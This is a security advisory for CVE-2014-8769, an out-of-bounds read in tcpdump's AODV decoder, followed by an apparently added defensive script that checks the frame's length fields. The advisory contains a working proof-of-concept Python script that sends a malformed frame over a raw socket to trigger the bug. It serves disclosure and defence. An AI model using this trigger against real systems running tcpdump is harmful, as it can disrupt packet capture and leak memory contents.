tcpdump 4.6.2 AODV Unreliable Output

Steffen Bauch
packetstormsecurity.com, PACKETSTORM:129157
2014-11-19

EPSS: 0.073 (Low), 93.4th percentile
CVE-2014-8769 tcpdump unreliable output using malformed AODV payload
  
1. Background  
  
tcpdump is a powerful command-line packet analyzer. It allows the user   
to intercept and display TCP/IP and other packets being transmitted or   
received over a network to which the computer is attached.  
  
2. Summary Information  
  
Malformed AODV network traffic causes abnormal behaviour in tcpdump when it
monitors the network with verbose output enabled.
  
3. Technical Description  
  
The decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol fails to
validate its input and performs unsafe out-of-bounds memory accesses. The
application will usually not crash; instead it reads out of bounds and outputs
(leaks) large amounts of invalid data, which might lead to dropped packets. It
is unknown whether other payloads exist that trigger segfaults.
  
To reproduce, start tcpdump on a network interface:

sudo tcpdump -i lo -s 0 -n -v

(running the program with sudo might hide a segfault message in certain
environments; see dmesg for details)

and use the following Python program to generate a frame on the network
(might also need sudo):
  
#!/usr/bin/env python
# Sends the malformed frame on the loopback interface so "tcpdump -i lo" sees it.
# AF_PACKET raw sockets require root (CAP_NET_RAW), hence the sudo note above.
from socket import socket, AF_PACKET, SOCK_RAW

s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))

# Ethernet + IPv4 + UDP (source port 654, the AODV port) + AODV payload.
# Bytes literal so the script runs under both Python 2 and Python 3.
aodv_frame = b"\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\x8e\x0d\x00\x4b\x00\x00\xe8\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01"

s.send(aodv_frame)
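As an added example that is not part of the advisory, the following Python script re-reads the frame from the reproducer above and compares every length field in the IPv4 and UDP headers with the bytes actually on the wire; the clamp at the end is the kind of bound a decoder must apply instead of trusting sender-controlled lengths. The frame bytes are the advisory's own; the function and field names are assumptions of this example.

```python
import struct

# The 75-byte frame from the reproducer above, copied verbatim into a bytes literal.
ADVISORY_FRAME = (
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00"          # Ethernet header
    b"\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6"                  # IPv4 header, first 12 bytes
    b"\x0a\x01\x01\x68\x0a\x02\x02\x02"                                  # IPv4 source/destination
    b"\x02\x8e\x0d\x00\x4b\x00\x00\xe8"                                  # UDP header
    b"\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f"  # UDP payload (AODV)
    b"\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01"
)

AODV_PORT = 654  # UDP port on which tcpdump hands traffic to its AODV decoder


def check_frame_lengths(frame):
    """Compare lengths declared in the IPv4/UDP headers with the bytes present.
    'inconsistent' lists fields a decoder must not trust; 'usable_payload' is the bound."""
    if len(frame) < 14 or struct.unpack("!H", frame[12:14])[0] != 0x0800:
        raise ValueError("expected an Ethernet frame carrying IPv4")
    ip = frame[14:]
    if len(ip) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, ip_total, _id, _frag, _ttl, proto, _csum = struct.unpack("!BBHHHBBH", ip[:12])
    ihl = (ver_ihl & 0x0F) * 4
    if (ver_ihl >> 4) != 4 or ihl < 20 or proto != 17 or len(ip) < ihl + 8:
        raise ValueError("not a complete IPv4/UDP packet")
    sport, dport, udp_len, _ucsum = struct.unpack("!HHHH", ip[ihl:ihl + 8])
    payload = ip[ihl + 8:]
    inconsistent = []
    if ip_total > len(ip):
        inconsistent.append("ipv4.total_length")
    if udp_len > len(ip) - ihl:
        inconsistent.append("udp.length")
    # Bound every read by the bytes actually captured, never by a sender-controlled
    # length field: here the headers claim tens of kilobytes behind a 33-byte payload.
    usable = min(len(payload), max(udp_len - 8, 0))
    return {
        "ip_declared": ip_total, "ip_actual": len(ip),
        "udp_declared": udp_len, "udp_actual": len(ip) - ihl,
        "src_port": sport, "dst_port": dport,
        "aodv_dispatch": AODV_PORT in (sport, dport),
        "payload_len": len(payload), "usable_payload": usable,
        "inconsistent": inconsistent,
    }


if __name__ == "__main__":
    for key, value in check_frame_lengths(ADVISORY_FRAME).items():
        print("%-16s %s" % (key, value))
```

On the advisory's frame the IPv4 header claims 58941 bytes and the UDP header 19200 where only 61 and 41 exist, so both fields are reported as inconsistent and the usable payload is clamped to the 33 bytes present.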
  
4. Affected versions  
  
Affected versions are 3.8 through 4.6.2  
  
5. Fix  
  
The problem is fixed in the upcoming version tcpdump 4.7.0  
  
6. Advisory Timeline  
  
2014-11-08 Discovered  
2014-11-09 Requested CVE  
2014-11-11 Reported to vendor by email
2014-11-12 Vendor made a fix available as repository patch  
2014-11-13 CVE number received  
2014-11-13 Published CVE advisory  
  
7. Credit  
  
The issue was found by  
  
Steffen Bauch  
Twitter: @steffenbauch  
http://steffenbauch.de  
  
using a slightly enhanced version of american fuzzy lop   
(https://code.google.com/p/american-fuzzy-lop/) created by Michal Zalewski.  